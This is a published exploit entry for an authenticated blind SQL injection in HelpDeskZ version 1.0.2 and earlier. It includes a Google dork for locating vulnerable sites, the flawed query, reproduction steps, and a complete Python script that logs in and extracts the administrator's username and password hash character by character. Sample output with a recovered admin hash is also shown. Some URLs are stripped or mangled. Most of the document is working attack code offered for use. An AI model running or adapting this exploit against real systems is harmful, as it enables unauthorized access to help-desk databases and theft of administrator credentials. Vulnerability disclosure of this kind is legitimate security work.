HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download
来源 作者:Poplawski 发布时间:2017-02-03
''' # Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download # Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket # Date: 2017-01-30 # Exploit Author: Mariusz Popławski, ( ) # Vendor Homepage: # Software Link: # Version: <= v1.0.2 # Tested on: # CVE : HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments. Software after ticket submit allow to download attachment by entering following link:¶m[]=2(VALID_TICKET_ID_HERE)¶m[]=attachment¶m[]=1¶m[]=1(ATTACHMENT_ID_HERE) FILE: view_tickets_controller.php LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]); third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization Steps to reproduce:¶m[]=2(VALID_TICKET_ID_HERE)¶m[]=attachment¶m[]=1¶m[]=1 or id>0 -- - by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment. Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD) steps: 1. go to 2. Submit a ticket with valid email (important we need password access). 3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query). 4. Get the password from email. 4. run script root@kali:~/Desktop# python password123 where = base url to helpdesk = email which we use to submit the ticket password123 = password that system sent to our email Output of script: root@kali:~/Desktop# python password123 2017-01-30T09:50:16.426076 GET 2017-01-30T09:50:16.429116 GET 2017-01-30T09:50:16.550654 POST 2017-01-30T09:50:16.575227 GET 2017-01-30T09:50:16.674929 GET¶m[]=6¶m[]=attachment¶m[]=1¶m[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20- ... ------------------------------------------ username: admin password: sha256(53874ea55571329c04b6998d9c7772c9274d3781) ''' import requests import sys if( len(sys.argv) < 3): print "put proper data like in example, remember to open a ticket before.... " print "python password123" exit() EMAIL = sys.argv[2] PASSWORD = sys.argv[3] URL = sys.argv[1] def get_token(content): token = content if "csrfhash" not in token: return "error" token = token[token.find('csrfhash" value="'):len(token)] if '" />' in token: token = token[token.find('value="')+7:token.find('" />')] else: token = token[token.find('value="')+7:token.find('"/>')] return token def get_ticket_id(content): ticketid = content if "param[]=" not in ticketid: return "error" ticketid = ticketid[ticketid.find('param[]='):len(ticketid)] ticketid = ticketid[8:ticketid.find('"')] return ticketid def main(): # Start a session so we can have persistant cookies session = requests.session(config={'verbose': sys.stderr}) r = session.get(URL+"") #GET THE TOKEN TO LOGIN TOKEN = get_token(r.content) if(TOKEN=="error"): print "cannot find token" exit(); #Data for login login_data = { 'do': 'login', 'csrfhash': TOKEN, 'email': EMAIL, 'password': PASSWORD, 'btn': 'Login' } # Authenticate r ="/?v=login", data=login_data) #GET ticketid ticket_id = get_ticket_id(r.content) if(ticket_id=="error"): print "ticketid not found, open a ticket first" exit() target = URL +"?v=view_tickets&action=ticket¶m[]="+ticket_id+"¶m[]=attachment¶m[]=1¶m[]=1" limit = 1 char = 47 prefix=[] while(char!=123): target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" response = session.get(target_prefix).content if "couldn't find" not in response: prefix.append(char) limit=limit+1 char=47 else: char=char+1 table_prefix = ''.join(chr(i) for i in prefix) table_prefix = table_prefix[0:table_prefix.find('staff')] limit = 1 char = 47 admin_u=[] while(char!=123): target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" response = session.get(target_username).content if "couldn't find" not in response: admin_u.append(char) limit=limit+1 char=47 else: char=char+1 limit = 1 char = 47 admin_pw=[] while(char!=123): target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" response = session.get(target_password).content if "couldn't find" not in response: admin_pw.append(char) limit=limit+1 char=47 else: char=char+1 admin_username = ''.join(chr(i) for i in admin_u) admin_password = ''.join(chr(i) for i in admin_pw) print "------------------------------------------" print "username: "+admin_username print "password: sha256("+admin_password+")" if admin_username=="" and admin_password=='': print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_" print "try to submit ticket with attachment" if __name__ == '__main__': main()
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